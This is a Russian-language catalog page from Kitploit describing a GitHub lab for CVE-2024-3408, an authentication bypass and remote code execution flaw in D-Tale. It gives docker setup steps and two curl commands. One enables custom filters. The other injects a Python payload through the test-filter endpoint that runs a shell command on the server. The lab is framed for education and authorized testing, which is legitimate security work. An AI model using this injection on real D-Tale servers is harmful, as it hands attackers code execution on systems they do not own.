Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-3408-dtale — Лаборатория уязвимостей для CVE-2024-3408 - обход аутентификации и RCE в D-Tale | Kitploit
Инструменты/GitHubGitHub/flame-11/cve-2024-3408-dtale
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubflame-11/cve-2024-3408-dtale

CVE-2024-3408-dtale

Лаборатория уязвимостей для CVE-2024-3408 - обход аутентификации и RCE в D-Tale

Репозиторий
28 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-3408 - Обход аутентификации и удаленное выполнение кода в D-Tale

Воспроизводимая лабораторная среда для CVE-2024-3408, уязвимости обхода аутентификации и удаленного выполнения кода в D-Tale.

Уязвимость

Версии D-Tale до 3.15.1 уязвимы из-за:

  1. Жестко заданного SECRET_KEY ("Dtale") для подписи сессий Flask – позволяет подделать cookie сессии
  2. Выполнения кода через пользовательские фильтры – конечная точка test-filter использует pandas query, который может быть использован для выполнения произвольного Python-кода

CVSS: 9.8 (Критический)
Затронутые версии: D-Tale <= 3.15.1

Быстрый старт

root@kitploit:~
docker compose up -d --build

D-Tale будет доступен по адресу http://localhost:40000

Проверка

root@kitploit:~
# Шаг 1: Включение пользовательских фильтров curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D" # Ожидаемый результат: {"success":true} # Шаг 2: Выполнение команды через инъекцию в pandas query curl -s -G "http://localhost:40000/dtale/test-filter/1" \ --data-urlencode "[email protected].__import__('os').popen('id').read()" # Ожидаемый результат: Ответ содержит "uid=" и "gid=" (вывод команды в сообщении об ошибке)

Очистка

root@kitploit:~
docker compose down

Ссылки

  • Отчет на Huntr (CVE-2024-3408)
  • Отчет на Huntr (CVE-2025-0655)
  • NVD
  • D-Tale GitHub

Отказ от ответственности

Данная лабораторная среда предназначена только для образовательных целей и авторизованного тестирования безопасности. Не используйте её против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.

Скачать инструмент